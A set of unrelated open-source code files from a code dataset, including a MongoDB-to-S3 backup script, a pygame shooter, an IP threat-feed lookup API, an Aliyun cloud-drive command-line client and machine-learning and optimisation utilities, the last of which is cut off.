loadmodel('wiki2vecVecfile.txt')\n\ttrain_cat_dict = readfiles('Etrain_cat')\n\ttrain_vectorsFile_avg = open('wiki2vec_AVG_train_catVectors','w')\n\ttrain_cat_vec = getVectors(train_cat_dict, embed, train_vectorsFile_avg)\n\n\ttest_cat_dict = readfiles('Etest_cat')\n\ttest_vectorsFile_avg = open('wiki2vec_AVG_test_catVectors','w')\n\ttest_cat_vec = getVectors(test_cat_dict, embed, test_vectorsFile_avg)\n\n\tdev_cat_dict = readfiles('Edev_cat')\n\tdev_vectorsFile_avg = open('wiki2vec_AVG_dev_catVectors','w')\n\tdev_cat_vec = getVectors(dev_cat_dict, embed, dev_vectorsFile_avg)\n","sub_path":"Language_Models/wiki2vecVectors.py","file_name":"wiki2vecVectors.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"558520365","text":"from subprocess import check_call\nimport os\nfrom datetime import datetime\n\nimport boto3\nfrom init.config import get_config\nfrom init.load_data import BACKUP_DIR, BACKUP_MONGO_PREFIX, BACKUP_TS_FORMAT\n\ndef backupMongoDB():\n\t# YYYY-mm-DD-HHMMSS\n\tts = datetime.now().strftime(BACKUP_TS_FORMAT)\n\toutput_folder = '%s_%s' % (BACKUP_MONGO_PREFIX,ts)\n\toutput_tar = '%s.tgz' % (output_folder)\n\t\n\t# get backup user and s3 info\n\tconfig = get_config()\n\tmongo_user = config['MONGO_BACKUP_USER']\n\tmongo_pw = config['MONGO_BACKUP_PW']\n\taws_email = config[\"AWS_EMAIL\"]\n\ts3_bucket = config[\"S3_MONGO_BACKUP_BUCKET\"]\n\t\n\t# backup file names\n\tbackup_folder = os.path.join(BACKUP_DIR,output_folder)\n\tbackup_tar = os.path.join(BACKUP_DIR,output_tar)\n\t\n\t# backup commands\n\tcheck_call(['mkdir','-p',BACKUP_DIR])\n\tcheck_call(['mongodump','-u',mongo_user,'-p',mongo_pw,'--out=%s' % backup_folder])\n\tcheck_call(['tar', '-czf', backup_tar, '-C', BACKUP_DIR, output_folder])\n\n\t# Upload to s3\n\tcheck_call(['aws','s3','cp',backup_tar,'s3://%s/' % s3_bucket,'--grants','read=emailaddress=%s' % aws_email])\n\n\t# remove local folder and tar\n\tcheck_call(['rm', '-rf', backup_folder])\n\tcheck_call(['rm', backup_tar])\n\n\treturn True\n\nif __name__ == \"__main__\":\n\tbackupMongoDB()\n\n","sub_path":"bin/backupMongo.py","file_name":"backupMongo.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"305493395","text":"import pygame\nimport json\nfrom 外星人入侵.settings import Settings\nfrom 外星人入侵.game_stats import GameStats\nfrom 外星人入侵.scoreboard import Scoreboard\nfrom 外星人入侵.button import Button\nfrom 外星人入侵.ship import Ship\nfrom pygame.sprite import Group\nimport 外星人入侵.game_functions as gf\n\n\ndef get_max_score(filename):\n    \"\"\"Return the stored high score, if one has been saved\"\"\"\n    try:\n        with open(filename) as file_obj:\n            num = json.load(file_obj)\n    except FileNotFoundError:\n        return None\n    else:\n        return num\n\n\ndef run_game():\n    # Initialize pygame, the Settings object, and the screen object\n    pygame.init()\n    settings = Settings()\n    screen = pygame.display.set_mode((settings.screen_width, settings.screen_height))\n    pygame.display.set_caption(settings.caption)\n    # Create a ship, a group of bullets, and a group of aliens\n    ship = Ship(settings, screen)\n    bullets = Group()\n    aliens = Group()\n    # Create the fleet of aliens\n    gf.create_fleet(settings, screen, ship, aliens)\n    # Create an instance to store game statistics, and create a scoreboard\n    stats = GameStats(settings)\n    stats.ships_left -= 1\n    stats.high_score = get_max_score(settings.max_score_file)\n    sb = Scoreboard(settings, screen, stats)\n    # Make the Play button\n    play_button = Button(settings, screen, \"Play\")\n    # Start the main loop for the game\n    while True:\n        gf.check_events(settings, screen, stats, sb, 
ship, aliens, bullets, play_button)\n        if stats.game_active:\n            ship.update()\n            gf.update_bullets(settings, screen, stats, sb, ship, aliens, bullets)\n            gf.update_aliens(settings, stats, sb, screen, ship, aliens, bullets)\n        gf.update_screen(settings, screen, stats, sb, ship, aliens, bullets, play_button)\n\n\nrun_game()\n","sub_path":"Jupyter_Notebook/Python入门/python编程:从入门到实践/外星人入侵/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"560058929","text":"from constrain import const_violation\n\n\ndef selection(f, fitness, target, trial, Fn):\n    phi_b = const_violation(trial, Fn)   # phi_b corresponds to the trial (donor) vector\n    phi_a = const_violation(target, Fn)  # phi_a corresponds to the target vector\n\n    # domination criteria\n    q1 = (phi_a == 0 and phi_b == 0)\n    q2 = f < fitness\n\n    r1 = (phi_b == 0)\n    r2 = phi_a > 0\n\n    s1 = (phi_b < phi_a)\n    s2 = phi_a > 0 and phi_b > 0\n\n    if (q1 and q2) or (r1 and r2) or (s1 and s2):\n        fitness = f\n        target = trial\n    return fitness, target\n","sub_path":"fCDE/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"287175220","text":"import hug\r\n\r\nfrom modules.db_feeds import FeedsAlchemy\r\nfrom modules.general import General\r\n\r\n\r\nFeedsAlchemy = FeedsAlchemy()\r\nGeneral = General()\r\n\r\nGeneral.logger.info(\"API instance successfully started\")\r\n\r\n\r\n@hug.post(\"/search\", output=hug.output_format.json, version=1)\r\ndef search(body):\r\n    \"\"\"Search IP in all available feeds. Input: a string containing IP addresses separated by commas in HTTP POST body\"\"\"\r\n\r\n    try:\r\n        payload = body.read().decode(\"utf-8\")\r\n    except AttributeError:\r\n        payload = body\r\n\r\n    try:\r\n        request_list = payload.split(\",\")\r\n\r\n        for request in request_list:\r\n            if General.validate_request(request):\r\n                pass\r\n            else:\r\n                return {\"errors\": \"Data validation error in '%s'\" % request}\r\n\r\n        return FeedsAlchemy.db_search_data(list(set(request_list)))\r\n\r\n    except AttributeError:\r\n\r\n        return {\"errors\": \"Error while searching occurred\"}\r\n\r\n\r\n@hug.get(\"/feeds\", output=hug.output_format.json, version=1)\r\ndef feeds():\r\n    \"\"\"Retrieve all information about feeds\"\"\"\r\n\r\n    return FeedsAlchemy.db_feeds()\r\n\r\n\r\n@hug.get(\"/feeds/categories\", output=hug.output_format.json, version=1)\r\ndef categories():\r\n    \"\"\"Retrieve all feed categories\"\"\"\r\n\r\n    return FeedsAlchemy.db_categories()\r\n\r\n\r\n@hug.get(\"/feeds/maintainers\", output=hug.output_format.json, version=1)\r\ndef maintainers():\r\n    \"\"\"Retrieve all feed maintainers\"\"\"\r\n\r\n    return FeedsAlchemy.db_all_maintainers()\r\n\r\n\r\n@hug.get(\"/feed/info\", output=hug.output_format.json, examples=\"feed_name=hphosts_psh\", version=1)\r\ndef feed_info(feed_name: hug.types.text):\r\n    \"\"\"Retrieve all available information about the feed by its name\"\"\"\r\n\r\n    feed_name_lower = feed_name.lower()\r\n\r\n    return FeedsAlchemy.db_feed_info(feed_name_lower)\r\n\r\n\r\n@hug.get(\"/maintainer/info\", output=hug.output_format.json, examples=\"maintainer=hpHosts\", version=1)\r\ndef maintainer_info(maintainer: hug.types.text):\r\n    \"\"\"Retrieve all available information about the maintainer by its name\"\"\"\r\n\r\n    maintainer_lower = maintainer.lower()\r\n\r\n    return 
FeedsAlchemy.db_maintainer_info(maintainer_lower)\r\n\r\n\r\n@hug.get(\"/maintainers/by_category\", output=hug.output_format.json, examples=\"category=spam\", version=1)\r\ndef maintainer_info(category: hug.types.text):\r\n \"\"\"Retrieve all maintainers by category\"\"\"\r\n\r\n category = category.lower()\r\n\r\n return FeedsAlchemy.db_maintainers(category)\r\n\r\n\r\n@hug.get(\"/ip/bulk/by_category\", output=hug.output_format.json, examples=\"category=reputation\", version=1)\r\ndef ip_bulk(category: hug.types.text):\r\n \"\"\"Retrieve all IP addresses that are in feeds by feed category\"\"\"\r\n\r\n category_lower = category.lower()\r\n\r\n return FeedsAlchemy.db_ip_bulk(category_lower)\r\n","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"81357970","text":"import os\nimport requests\nfrom aliyunpan.api.core import AliyunPan\nfrom aliyunpan.api.models import *\nfrom aliyunpan.api.req import *\nfrom aliyunpan.api.utils import *\nfrom aliyunpan.cli.config import Config\nfrom aliyunpan.common import *\nfrom aliyunpan.exceptions import InvalidRefreshToken, InvalidPassword, LoginFailed, InvalidConfiguration, \\\n ConfigurationFileNotFoundError\n\n__all__ = ['Commander']\n\n\nclass Commander:\n def __init__(self):\n self._disk = AliyunPan()\n self._path_list = PathList(self._disk)\n self._req = Req()\n self._config = Config()\n self._task_config = Config(ROOT_DIR / Path('tasks.yaml'))\n self._share_link = 'aliyunpan://'\n self._print = Printer()\n GLOBAL_VAR.tasks = self._task_config.read()\n GLOBAL_VAR.txt = ''\n\n def __del__(self):\n self._task_config.write(GLOBAL_VAR.tasks)\n\n def init(self, config_file='~/.config/aliyunpan.yaml', refresh_token=None, username=None, password=None, depth=3):\n self._path_list.depth = depth\n specify_conf_file = os.environ.get(\"ALIYUNPAN_CONF\", \"\")\n config_file = list(\n filter(lambda x: Path(x).is_file(), map(lambda x: Path(x).expanduser(), [specify_conf_file, config_file])))\n if refresh_token:\n if not len(refresh_token) == 32:\n raise InvalidRefreshToken\n self._disk.refresh_token = refresh_token\n elif username:\n if not password:\n raise InvalidPassword\n if not self._disk.login(username, password):\n raise LoginFailed\n elif config_file:\n self._config.config_file = config_file[0]\n refresh_token = self._config.get('refresh_token')\n username = self._config.get('username')\n password = self._config.get('password')\n if refresh_token:\n if not len(refresh_token) == 32:\n raise InvalidRefreshToken\n self._disk.refresh_token = refresh_token\n elif username:\n if not password:\n raise InvalidPassword\n if not self._disk.login(username, password):\n raise LoginFailed\n else:\n raise InvalidConfiguration\n else:\n raise ConfigurationFileNotFoundError\n\n def ls(self, path, l):\n for i in self._path_list.get_path_list(path, update=False):\n if l:\n if i.type:\n print(str_of_size(i.size), time.strftime('%d %b %H:%M', i.ctime), i.id, i.name)\n else:\n print('-', time.strftime('%d %b %H:%M', i.ctime), i.id, i.name)\n else:\n print(i.name, end='\\t')\n\n def tree(self, path='root'):\n return self._path_list.tree(path)\n\n def rm(self, path):\n file_id = self._path_list.get_path_fid(path, update=False)\n if not file_id:\n raise FileNotFoundError(path)\n file_id_ = self._disk.delete_file(file_id)\n if file_id_ == file_id:\n self._path_list._tree.remove_node(file_id)\n self._print.remove_info(path, status=False)\n 
return file_id_\n\n def mv(self, path, target_path):\n file_id = self._path_list.get_path_fid(path, update=False)\n _ = self._disk.move_file(self._path_list.get_path_fid(path, update=False),\n self._path_list.get_path_fid(target_path, update=False))\n if _ and file_id:\n self._print.move_info(path, target_path, status=True)\n self._path_list._tree.remove_node(file_id)\n self._path_list.update_path_list(Path(target_path) / path, is_fid=False)\n else:\n self._print.move_info(path, target_path, status=False)\n return _\n\n def mkdir(self, path):\n file_id_list = []\n path = PurePosixPath(Path(path).as_posix())\n if str(path) == 'root':\n return file_id_list\n file_id = self._path_list.get_path_fid(path, update=False)\n if file_id and file_id != 'root':\n return file_id_list\n parent_file_id = self._path_list.get_path_fid(path.parent, update=False)\n if not parent_file_id:\n file_id_list.extend(self.mkdir(path.parent))\n parent_file_id, _ = file_id_list[-1]\n r = self._disk.create_file(path.name, parent_file_id)\n try:\n file_id = r.json()['file_id']\n except KeyError:\n logger.debug(r.json()['message'])\n return False\n if file_id:\n self._print.mkdir_info(path, status=True)\n self._path_list._tree.create_node(tag=path.name, identifier=file_id, parent=parent_file_id)\n file_id_list.append((file_id, path))\n return file_id_list\n\n def upload(self, path, upload_path='root', timeout=10.0, retry=3, force=False, share=False, chunk_size=None,\n c=False):\n if isinstance(path, str):\n path_list = (path,)\n else:\n path_list = path\n result_list = []\n for path in path_list:\n if path:\n if self._share_link in path:\n share_list = []\n if share:\n share_info = parse_share_url(path)\n file = self._path_list.get_path_node(share_info.name, update=False)\n if file and not file.data.type:\n path = path.replace(share_info.name, share_info.name + str(int(time.time())))\n share_info = parse_share_url(path)\n if not self._path_list.get_path_fid(share_info.name, update=False):\n self.upload_share(share_info)\n self._path_list.update_path_list(depth=0)\n if share_info.path == 'root':\n path_ = share_info.name\n else:\n path_ = share_info.path / share_info.name\n for line in self.cat(path_).split('\\n'):\n if line.startswith(self._share_link):\n share_list.append(parse_share_url(line))\n self.rm(path_)\n if upload_path == 'root':\n upload_path = share_info.path\n else:\n upload_path /= share_info.path\n else:\n share_list = parse_share_url(path)\n return self.upload_share(share_list, upload_path, force)\n path = Path(path)\n if path.is_file():\n if share:\n share_list = []\n with open(path, 'r', encoding='utf-8') as f:\n while True:\n line = f.readline()\n if not line:\n break\n if line.startswith(self._share_link):\n share_list.append(parse_share_url(line))\n return self.upload_share(share_list, upload_path, force)\n else:\n try:\n file_id = self._disk.upload_file(\n parent_file_id=self._path_list.get_path_fid(upload_path, update=False), path=path,\n upload_timeout=timeout, retry_num=retry, force=force, chunk_size=chunk_size, c=c)\n except KeyboardInterrupt:\n self.__del__()\n raise\n result_list.append(file_id)\n elif path.is_dir():\n if upload_path == 'root':\n upload_path = '/'\n upload_path = Path(upload_path)\n upload_file_list = self.upload_dir(path, upload_path)\n for file in upload_file_list:\n try:\n result = self._disk.upload_file(\n parent_file_id=self._path_list.get_path_fid(file[0], update=False), path=file[1],\n upload_timeout=timeout, retry_num=retry, force=force, chunk_size=chunk_size, c=c)\n 
except KeyboardInterrupt:\n self.__del__()\n raise\n result_list.append(result)\n else:\n raise FileNotFoundError\n for file_hash, path in GLOBAL_VAR.file_set:\n if file_hash in GLOBAL_VAR.tasks and GLOBAL_VAR.tasks[file_hash].upload_time:\n if isinstance(GLOBAL_VAR.tasks[file_hash].path, str):\n del GLOBAL_VAR.tasks[file_hash]\n else:\n try:\n GLOBAL_VAR.tasks[file_hash].path.remove(path)\n except ValueError:\n pass\n if not GLOBAL_VAR.tasks[file_hash].path:\n del GLOBAL_VAR.tasks[file_hash]\n if len(result_list) == 1:\n result_list = result_list[0]\n return result_list\n\n def upload_dir(self, path, upload_path):\n upload_path = upload_path / path.name\n if not self._path_list.get_path_fid(upload_path, update=False):\n self.mkdir(upload_path)\n upload_file_list = []\n for file in path.iterdir():\n if file.is_dir():\n upload_file_list.extend(self.upload_dir(file, upload_path))\n else:\n upload_file_list.append([upload_path, file])\n return upload_file_list\n\n def upload_share(self, share_info_list: ShareInfo, upload_path='root', force=False):\n if not isinstance(share_info_list, list):\n share_info_list = [share_info_list]\n if upload_path == 'root':\n upload_path = ''\n upload_path = PurePosixPath(Path(upload_path).as_posix())\n folder_list = []\n file_list = []\n for share_info in share_info_list:\n file_id_list = self.mkdir(upload_path / share_info.path)\n if file_id_list:\n for file_id, path in file_id_list:\n folder_list.append((file_id, upload_path / path))\n folder_list = tuple(set(folder_list))\n for share_info in share_info_list:\n path = share_info.path\n if not str(upload_path) and str(path) == 'root':\n path = Path('')\n parent_file_id = self._path_list.get_path_fid(upload_path / path)\n result = self._disk.save_share_link(share_info.name, share_info.content_hash, share_info.content_hash_name,\n share_info.size, parent_file_id, force)\n p = PurePosixPath(Path(upload_path / path / share_info.name).as_posix())\n file_list.append((result, p))\n if result:\n self._print.upload_info(p, status=True, rapid_upload=True)\n else:\n self._print.upload_info(p, status=False)\n return folder_list, file_list\n\n def download(self, path, save_path=None, single_file=False, share=False):\n if not save_path:\n save_path = Path().cwd()\n save_path = Path(save_path)\n if isinstance(path, str):\n path_list = (path,)\n else:\n path_list = path\n for path in path_list:\n if str(path).startswith(self._share_link) or share:\n folder_list, file_list = self.upload(path, share=share)\n folder_list = sorted(folder_list, key=lambda x: x[1])\n for file_id, path in folder_list:\n p = save_path / path\n try:\n p.mkdir(parents=True)\n self._print.mkdir_info(p, status=True)\n except FileExistsError:\n pass\n for file_id, path in file_list:\n self.download_file(save_path / path, self._disk.get_download_url(file_id))\n for file_id, path in file_list:\n self._path_list.update_path_list(path.parent, depth=0, is_fid=False)\n try:\n self.rm(path)\n except FileNotFoundError:\n pass\n for file_id, path in folder_list:\n try:\n self.rm(path)\n except FileNotFoundError:\n pass\n continue\n if isinstance(path, (Path, PurePosixPath, str)):\n path = PurePosixPath(Path(path).as_posix())\n node = self._path_list.get_path_node(path, update=False)\n if not node:\n raise FileNotFoundError(path)\n file_node = node.data\n self._path_list.update_path_list(file_node.id)\n if file_node.type:\n single_file = True\n else:\n file_node, path = path, path.name\n p = save_path / path\n if file_node.type:\n if single_file:\n p = save_path / 
p.name\n self._print.download_info(p)\n self.download_file(p, file_node.download_url)\n else:\n self.download(self._path_list.get_fid_list(file_node.id), save_path / p.name)\n\n def download_file(self, path, url):\n try:\n path.parent.mkdir(parents=True)\n self._print.mkdir_info(path.parent, status=True)\n except FileExistsError:\n pass\n if path.exists():\n temp_size = path.stat().st_size\n else:\n temp_size = 0\n headers = {'Range': 'bytes=%d-' % temp_size}\n try:\n r = self._req.get(url, headers=headers, stream=True)\n file_size = int(r.headers['Content-Length'])\n if temp_size == file_size and file_size != 0:\n self._print.download_info(path, status=True)\n return True\n elif temp_size > file_size:\n mode = 'wb'\n temp_size = 0\n else:\n mode = 'ab'\n download_bar = DownloadBar(size=file_size)\n download_bar.update(refresh_line=False)\n with path.open(mode) as f:\n for chunk in r.iter_content(chunk_size=1024):\n k = temp_size / file_size\n download_bar.update(ratio=k, refresh_line=True)\n if chunk:\n temp_size += len(chunk)\n f.write(chunk)\n except requests.exceptions.RequestException:\n self._print.download_info(path, status=False)\n return False\n self._print.download_info(path, status=True, t=download_bar.time, average_speed=download_bar.average_speed,\n refresh_line=True)\n return True\n\n def cat(self, path, encoding='utf-8'):\n file_node = self._path_list.get_path_node(path, update=False)\n if not file_node:\n raise FileNotFoundError(path)\n file = file_node.data\n self._path_list.update_path_list(file.id)\n r = self._req.get(file.download_url)\n r.encoding = encoding\n return r.text\n\n def share(self, path, file_id, expire_sec, share_link, download_link, save):\n def share_(path, file_id, parent_file=''):\n if path:\n file_node = self._path_list.get_path_node(path, update=False)\n if not file_node:\n raise FileNotFoundError(path)\n file = file_node.data\n self._path_list.update_path_list(file.id)\n else:\n file = self._path_list._tree.get_node(file_id).data\n if file.type:\n share_txt = file.name.center(50, '-') + '\\n'\n if download_link:\n share_txt += '下载链接'.center(50, '*') + '\\n'\n url = self._disk.get_download_url(file.id, expire_sec)\n share_txt += url + '\\n\\n'\n if share_link:\n share_txt += '分享链接'.center(50, '*') + '\\n'\n url = f'{self._share_link}{file.name}|{file.content_hash}|{file.size}|{parent_file or \"root\"}'\n share_txt += url + '\\n'\n share_txt += '导入链接'.center(50, '*') + '\\n'\n share_txt += f'python main.py upload \"{url}\"' + '\\n\\n'\n print(share_txt)\n GLOBAL_VAR.txt += share_txt\n else:\n for i in self._path_list.get_fid_list(file.id):\n share_(path=None, file_id=i.id, parent_file=Path(parent_file) / file.name)\n\n GLOBAL_VAR.txt += '*' * 50 + '\\n'\n GLOBAL_VAR.txt += '项目地址: https://github.com/wxy1343/aliyunpan' + '\\n'\n GLOBAL_VAR.txt += '*' * 50 + '\\n\\n'\n share_(path, file_id)\n if save:\n file_name = Path(path).name + f'{int(time.time())}.txt'\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(GLOBAL_VAR.txt)\n print('文件导入'.center(50, '*'))\n print(f'python main.py upload -s {file_name}')\n print('链接导入'.center(50, '*'))\n file_id = self.upload(file_name)\n print()\n if file_id:\n self._path_list.update_path_list(depth=1)\n file = self._path_list._tree.get_node(file_id).data\n url = f'{self._share_link}{Path(path).name}|{file.content_hash}|{file.size}|root'\n print(f'python main.py upload -s 
\"{url}\"')\n","sub_path":"aliyunpan/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":18004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"475045209","text":"\"\"\"\r\nCreated on Dec 29 2019\r\nCode for 3D task activation regression with convolutional networks based on resting state connectivity data\r\n@author: mregina\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport nibabel\r\n\r\n# correlation calculation for keras metric and loss classes\r\ndef calculate_correlation(y_true, y_pred, sample_weight=None):\r\n assert len(y_true.shape)==5\r\n mean_ytrue = tf.reduce_mean(y_true, keepdims=True, axis=[1,2,3,4])\r\n mean_ypred = tf.reduce_mean(y_pred, keepdims=True, axis=[1,2,3,4])\r\n\r\n demean_ytrue = y_true - mean_ytrue\r\n demean_ypred = y_pred - mean_ypred\r\n\r\n if sample_weight is not None:\r\n sample_weight = tf.broadcast_weights(sample_weight, y_true)\r\n std_y = tf.sqrt(tf.reduce_sum(sample_weight * tf.square(demean_ytrue)) * tf.reduce_sum(\r\n sample_weight * tf.square(demean_ypred)))\r\n correlation = tf.reduce_sum(sample_weight * demean_ytrue * demean_ypred) / std_y\r\n else:\r\n std_y = tf.sqrt(tf.reduce_sum(tf.square(demean_ytrue)) * tf.reduce_sum(tf.square(demean_ypred)))\r\n correlation = tf.reduce_sum(demean_ytrue * demean_ypred) / std_y\r\n return tf.maximum(tf.minimum(correlation, 1.0), -1.0)\r\n\r\n# correlation metric\r\nclass CorrelationMetric(tf.keras.metrics.Metric):\r\n def __init__(self, name=\"correlation\", **kwargs):\r\n super(CorrelationMetric, self).__init__(name, **kwargs)\r\n self.correlation = self.add_weight(name='correlation', initializer='zeros')\r\n\r\n def update_state(self, y_true, y_pred, sample_weight=None):\r\n correlation = calculate_correlation(y_true, y_pred, sample_weight)\r\n self.correlation.assign(correlation)\r\n\r\n def result(self):\r\n return self.correlation\r\n\r\n\r\n# correlation as loss function\r\nclass CorrelationLoss(tf.keras.losses.Loss):\r\n def call(self, y_true, y_pred, sample_weight=None):\r\n correlation = calculate_correlation(y_true, y_pred, sample_weight)\r\n return 1.0 - correlation\r\n\r\n\r\n# create input datasets as a sequence\r\nclass NiiSequence(tf.keras.utils.Sequence):\r\n def __init__(self, subIDs, rootpath, dataname, labelname, batch_size, shuffle=False):\r\n self.subIDs = subIDs\r\n self.batch_size = batch_size\r\n self.rootpath = rootpath\r\n self.dataname = dataname\r\n self.labelname = labelname\r\n self.shuffle = shuffle\r\n\r\n def __len__(self):\r\n return np.ceil(len(self.subIDs) / self.batch_size).astype(np.int64)\r\n\r\n def __getitem__(self, idx):\r\n if self.shuffle and idx == 0:\r\n shuffle_ids = np.arange(len(self.subIDs))\r\n np.random.shuffle(shuffle_ids)\r\n self.subIDs = np.array(self.subIDs)[shuffle_ids]\r\n subID_batch = self.subIDs[idx * self.batch_size:(idx + 1) * self.batch_size]\r\n data_batch = []\r\n label_batch = []\r\n for subID in subID_batch:\r\n data = nibabel.load(self.rootpath + subID + self.dataname).get_fdata()\r\n label = nibabel.load(self.rootpath + subID + self.labelname).get_fdata()\r\n label = np.expand_dims(label, axis=3)\r\n\r\n data_batch.append(data)\r\n label_batch.append(label)\r\n if self.batch_size>1:\r\n return np.stack(data_batch, axis=0), np.stack(label_batch, axis=0)\r\n else:\r\n return np.expand_dims(data, axis=0), np.expand_dims(label, axis=0)\r\n\r\n \r\n# save predicted images in niftii format for later tests and visual checking\r\ndef 
save_prediction(predicted_batch, rootpath, template_subID, labelname, batch_id=None, subIDs=None):\r\n template_img = nibabel.load(rootpath + template_subID + labelname)\r\n batch_size = predicted_batch.shape[0]\r\n for i in range(batch_size):\r\n new_img = nibabel.Nifti1Image(predicted_batch[i, :, :, :, 0], template_img.affine, template_img.header)\r\n if subIDs is not None:\r\n filename = rootpath + subIDs[i] + '_predicted' + labelname\r\n elif batch_id is not None:\r\n filename = rootpath + str(batch_id * batch_size + i) + '_predicted' + labelname\r\n else:\r\n filename = rootpath + str(i) + '_predicted' + labelname\r\n nibabel.save(new_img, filename)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"353818","text":"from gurobipy import *\nimport cPickle as pickle\nimport pdb, itertools, driver, time\nimport bisect\nimport random, time, math\nimport numpy as np\nimport numpy.matlib\nimport scipy.optimize\nfrom scipy.misc import logsumexp\nrandom.seed(2)\ngurobipy.setParam(GRB.Param.MIPGap,0.01)\ngurobipy.setParam(\"OutputFlag\",0)\ngurobipy.setParam(\"Threads\",3) \ngurobipy.setParam(\"MIPFocus\",1)\n\n\nSTART_NODE = 0\nEND_NODE = 1\nFIRST_REAL_NODE = 2\n\n\ndef permute(L):\n return random.sample(L,len(L))\n #return L\n\n'''\nfind min hamiltonaian path and transitive tournament\n\ndef find_path_extended(G,weights,probs_instead_of_weights=False):\n\n # Create a new model\n m = Model(\"hamiltonian_cycle and acyclic tournament\")\n\n # Create variables\n # edges\n x_vars = {}\n # nodes\n u_vars = {}\n # new edges\n z_vars = {}\n for var1 in permute(G.vertices()):\n for var2 in permute(G.vertices()):\n if var1 != var2:\n x_vars[(var1,var2)] = m.addVar(vtype='B', name=\"x_\"+str(var1)+'_'+str(var2))\n z_vars[(var1,var2)] = m.addVar(vtype='B', name=\"z_\"+str(var1)+'_'+str(var2))\n\n u_vars[var1] = m.addVar(vtype=GRB.INTEGER, name=\"u_\"+str(var1))\n m.update()\n\n for var in G.vertices():\n if var != START_NODE:\n cur_incoming = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[1] == var)])\n #print(cur_incoming)\n m.addConstr(cur_incoming,GRB.EQUAL,1.0)\n\n if var != END_NODE:\n cur_outgoing = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[0] == var)])\n #print(cur_outgoing)\n m.addConstr(cur_outgoing,GRB.EQUAL,1.0)\n\n for var1 in G.vertices():\n for var2 in G.vertices():\n if var1 != var2:\n c = LinExpr([(1.0,u_vars[var1]),(-1.0,u_vars[var2]),(G.num_vertices(),x_vars[(var1,var2)])])\n #print(c)\n m.addConstr(c,GRB.LESS_EQUAL,G.num_vertices()-1)\n\n one_direction = LinExpr([(1.0, z_vars[(var1, var2)]),(1.0, z_vars[(var2, var1)])])\n m.addConstr(one_direction, GRB.EQUAL, 1)\n connect_vars = LinExpr([(1.0, x_vars[(var1, var2)]),(-1.0, z_vars[(var1, var2)])])\n m.addConstr(connect_vars, GRB.LESS_EQUAL, 0)\n connect_vars_inverse = LinExpr([(1.0, x_vars[(var2, var1)]),(-1.0, z_vars[(var2, var1)])])\n m.addConstr(connect_vars_inverse, GRB.LESS_EQUAL, 0)\n #rule out cycles with size 3\n for var3 in G.vertices():\n if var3 != var2 and var3 != var1:\n cycle = LinExpr([(1.0, z_vars[(var1, var2)]),(1.0, z_vars[(var2, var3)]), (1.0, z_vars[(var3, var1)])])\n inverse_cycle = LinExpr([(1.0, z_vars[(var2, var1)]),(1.0, z_vars[(var1, var3)]), (1.0, z_vars[(var3, var2)])])\n m.addConstr(cycle, GRB.LESS_EQUAL, 2)\n m.addConstr(inverse_cycle, GRB.LESS_EQUAL, 2)\n\n # Set objective\n #try:\n edge_weights = permute(G.get_edge_weights(weights))\n if 
probs_instead_of_weights:\n all_probs = []\n for v in G.vertices():\n if v != END_NODE:\n batch_scores = [(e,w) for e,w in edge_weights if e[0] == v]\n S = logsumexp([x[1] for x in batch_scores])\n batch_scores = [(e,np.exp(w-S)) for e,w in batch_scores]\n all_probs.extend(batch_scores)\n edge_weights = all_probs\n objective = LinExpr([(weight,x_vars[edge]) for edge,weight in edge_weights] + [(weight,z_vars[edge]) for edge,weight in edge_weights])\n #except TypeError:\n # return None\n\n m.setObjective(objective,GRB.MINIMIZE)\n code = m.optimize()\n\n try:\n return [k for k,v in x_vars.items() if v.x > 0.98]\n except GurobiError:\n return None\n'''\n\ndef find_min_hamiltonian_path(G,weights,probs_instead_of_weights=False):\n \"\"\"\n finds the minimal hamiltonian path in G between the start_node\n and the end_node. returns the set of edges participating in the\n path.\n \"\"\"\n\n # Create a new model\n m = Model(\"hamiltonian_cycle\")\n \n # Create variables\n x_vars = {}\n u_vars = {}\n for var1 in permute(G.vertices()):\n for var2 in permute(G.vertices()):\n if var1 != var2:\n x_vars[(var1,var2)] = m.addVar(vtype='B', name=\"x_\"+str(var1)+'_'+str(var2))\n u_vars[var1] = m.addVar(vtype=GRB.INTEGER, name=\"u_\"+str(var1))\n m.update()\n \n for var in G.vertices():\n if var != START_NODE:\n cur_incoming = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[1] == var)])\n #print(cur_incoming)\n m.addConstr(cur_incoming,GRB.EQUAL,1.0)\n \n if var != END_NODE:\n cur_outgoing = LinExpr([(1.0,v) for k,v in x_vars.items() if (k[0] == var)])\n #print(cur_outgoing)\n m.addConstr(cur_outgoing,GRB.EQUAL,1.0)\n \n for var1 in G.vertices():\n for var2 in G.vertices():\n if var1 != var2:\n c = LinExpr([(1.0,u_vars[var1]),(-1.0,u_vars[var2]),(G.num_vertices(),x_vars[(var1,var2)])])\n #print(c)\n m.addConstr(c,GRB.LESS_EQUAL,G.num_vertices()-1)\n \n # Set objective\n #try:\n edge_weights = permute(G.get_edge_weights(weights))\n if probs_instead_of_weights:\n all_probs = []\n for v in G.vertices():\n if v != END_NODE:\n batch_scores = [(e,w) for e,w in edge_weights if e[0] == v]\n S = logsumexp([x[1] for x in batch_scores])\n batch_scores = [(e,np.exp(w-S)) for e,w in batch_scores]\n all_probs.extend(batch_scores)\n edge_weights = all_probs\n objective = LinExpr([(weight,x_vars[edge]) 